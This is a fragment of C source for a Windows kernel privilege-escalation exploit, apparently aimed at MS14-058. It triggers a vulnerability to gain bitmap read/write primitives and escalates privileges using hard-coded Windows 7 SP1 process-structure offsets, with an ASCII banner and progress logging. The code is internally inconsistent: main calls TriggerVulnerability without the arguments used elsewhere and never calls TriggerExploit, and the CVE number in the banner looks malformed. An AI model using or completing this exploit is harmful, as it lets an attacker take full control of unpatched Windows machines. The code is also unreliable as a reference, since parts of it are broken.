BOOLEAN TriggerExploit(VOID) { PPEB pPeb; HBITMAP hManager, hWorker; EPROCESS_OFFSETS win7SP1Offsets = { 0x180, 0x208 }; LOG("\n"); pPeb = GetCurrentPeb(); if (pPeb == NULL) { LOG("[-] Unable To Get The Current PEB\n"); return FALSE; } if (TriggerVulnerability(pPeb, &hManager, &hWorker) == FALSE) { LOG("[-] Unable To Trigger Vulnerability\n"); return FALSE; } LOG("[+] Vulnerability Triggered\n"); LOG("[+] Bitmap Read/Write Primitives Now Available\n"); if (TriggerPrivilegeEscalation(hManager, hWorker, &win7SP1Offsets) == FALSE) { LOG("[-] Unable To Trigger Exploit\n"); return FALSE; } LOG("[+] Privilege Escalation Triggered\n\n"); return TRUE; }
INT main(UINT argc, PTCHAR argv[]) { CONST PTCHAR banner = " \n" " # # ##### ####### \n" " # # ## #### # # # # # # #### # ###### ## # #\n" " # # # # # # # # # # # # # # # # ## ##\n" " ####### # # # #### ##### # #### # ##### # # # ## #\n" " # # ###### # # # # # # # # ###### # #\n" " # # # # # # # # # # # # # # # # # # #\n" " # # # # #### # # ##### # #### # ###### # # # #\n" " \n" " CVE-2014-41143 / MS14-058 \n" " \n"; // print the banner DEBUG_MESSAGE(banner); TriggerVulnerability(); return EXIT_SUCCESS; }